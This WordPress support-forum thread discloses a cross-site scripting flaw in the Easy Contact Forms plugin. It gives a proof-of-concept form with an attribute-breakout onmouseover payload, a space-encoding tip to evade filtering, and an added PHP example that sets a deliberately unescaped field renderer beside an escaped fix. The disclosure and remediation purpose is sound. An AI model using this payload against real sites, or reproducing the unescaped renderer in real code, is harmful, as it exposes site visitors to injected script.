Title: XSS vulnerability
Last modified: August 22, 2016

---

# XSS vulnerability

**[Oleg Musaev](https://wordpress.org/support/users/oleg-musaev/)** (@oleg-musaev), [11 years, 6 months ago](https://wordpress.org/support/topic/xss-vulnerability-8/)

Hello. Our team has discovered an XSS vulnerability. You must escape form values to provide a fix. Here is a sample form, which can be used to reproduce the problem:

```html
<html>
  <body>
    <form action="http://yoursiteurl.here/contacts/" method="POST">
      <input type="hidden" name="cf-no-script" value="1" />
      <input type="hidden" name="hidden-1" value="ufo-form-id-1" />
      <input type="hidden" name="id-3324" value="1&apos; onmouseover=alert(123) bad=&apos;" />
      <input type="hidden" name="id-3326" value="1" />
      <input type="hidden" name="id-3327" value="1" />
      <input type="hidden" name="id-3330" value="1" />
      <input type="hidden" name="sid" value="e20579ba69a4faccbb3efb7ef5e0692d" />
      <input type="hidden" name="ufo-form-pagename" value="contacts" />
      <input type="hidden" name="ufo-sign" value="b4cd2c00af96cf60c2db680ffbfa72841412162299" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

Put in the appropriate field IDs. Set up one required field and leave its value attribute empty. Into another field insert the following value:

```html
value="1&apos; onmouseover=alert(123) bad=&apos;" />
```

Now you can submit the created HTML form and the alert function will run.

[https://wordpress.org/plugins/easy-contact-forms/](https://wordpress.org/plugins/easy-contact-forms/)

Viewing 1 replies (of 1 total)

Thread Starter **[Oleg Musaev](https://wordpress.org/support/users/oleg-musaev/)** (@oleg-musaev), [11 years, 6 months ago](https://wordpress.org/support/topic/xss-vulnerability-8/#post-5411585)

Use `&#32;` (without spaces :)) instead of spaces in the value attribute
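As an added example (not the plugin's or the reporter's code) covering the report and the follow-up above: the re-render pattern that produces this bug, where submitted values are written back into a single-quoted `value` attribute when a required field is missing, beside the attribute-escaped version, with a check that parses each result the way a browser would. The field name `id-3324` comes from the report; the function names and the sample `$_POST` array are assumptions.

```php
<?php
// Added example (not the plugin's code): the re-render pattern behind this
// report, submitted values written back into value='' attributes when a
// required field is empty, beside the attribute-escaped version. The helpers
// and the parsed-attribute check are this example's own.

// Constructed stand-in for $_POST built from the report's form.
$posted = [
    'id-3324' => "1' onmouseover=alert(123) bad='",
    'id-3326' => '',   // required field left empty: this is what triggers the re-render
];

// Vulnerable: raw input interpolated into a single-quoted attribute.
function render_field_unescaped(string $name, string $value): string
{
    return "<input type='text' name='$name' value='$value' />";
}

// Hardened: attribute-escape every value first. ENT_QUOTES matters, because
// the breakout character here is a single quote; escaping '&' as well keeps
// entity-based variants such as the follow-up's &#32; from being reinterpreted.
// In WordPress plugin code the equivalent call is esc_attr($value).
function render_field_escaped(string $name, string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return "<input type='text' name='$name' value='$safe' />";
}

// Parse the markup as a browser would and return the attributes the <input>
// ends up with; any on* attribute means the value escaped its quotes.
function parsed_attributes(string $html): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $attrs = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $a) {
        $attrs[$a->name] = $a->value;
    }
    return $attrs;
}

foreach (['unescaped' => 'render_field_unescaped',
          'escaped'   => 'render_field_escaped'] as $label => $fn) {
    $attrs    = parsed_attributes($fn('id-3324', $posted['id-3324']));
    $handlers = array_filter(array_keys($attrs), fn($k) => str_starts_with($k, 'on'));
    printf("%-9s value=%s handlers=%s\n", $label,
        var_export($attrs['value'], true), $handlers ? implode(',', $handlers) : 'none');
}
```

The unescaped render yields an `onmouseover` attribute on the parsed element, while the escaped render yields none and its parsed `value` equals the submitted string exactly.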


The topic ‘XSS vulnerability’ is closed to new replies.


## Tags

 * [xss](https://wordpress.org/support/topic-tag/xss/)

 * 1 reply
 * 1 participant
 * Last reply from: [Oleg Musaev](https://wordpress.org/support/users/oleg-musaev/)
 * Last activity: [11 years, 6 months ago](https://wordpress.org/support/topic/xss-vulnerability-8/#post-5411585)
 * Status: not resolved